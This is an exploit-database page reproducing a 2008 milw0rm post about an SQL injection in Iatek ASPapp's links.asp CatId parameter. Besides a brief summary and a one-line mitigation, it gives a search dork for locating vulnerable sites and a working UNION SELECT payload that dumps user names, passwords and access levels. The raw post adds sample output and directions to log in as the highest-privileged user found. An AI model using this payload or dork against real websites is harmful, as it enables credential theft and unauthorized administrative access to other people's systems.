header-logo
Suggest Exploit
vendor:
ASPapp
by:
str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ASPapp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability

A SQL injection vulnerability exists in Iatek | ASPapp -links.asp (CatId) which allows an attacker to gain access to the admin login page. The attacker can use the dork ''links.asp?CatId'' to find vulnerable websites and then use the exploit www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3Flinks.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users to gain access to the admin login page.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

-----------------Turkey--------------------------------------
                                               
--------- www.Hayalet-hack.com-------------------------------

----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability 
-------------------------------------------------
 you ll see lots of users like this but  accesslevel ll help you for see admin
-------------------------------------------------------------
----------------example--------------------------------------

Links › guest  ›  12    › 1     user
Links › editor › editor › 2     materator
Links › manager› manager› 2     materator
Links › surco  › surco  › 2     materator
Links › admin  › admin  › 3     admin
Links › ovivas › ovivas › 4     super-admin----- we  ll login with this username
-------------------------------------------------------------

-------------------------------------------------------------
i mean.. when you see  big number  4 or 5  you can  use this username and password
-------------------------------------------------------------

-------
dork   -  ''links.asp?CatId''
-------
exploit-
-------
admin login- 
-------
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
-------
-------------------------------------------------------------
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
-------------------------------------------------------------

thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

# milw0rm.com [2008-03-19]

Navigation

Suggest Exploit

Services By CQR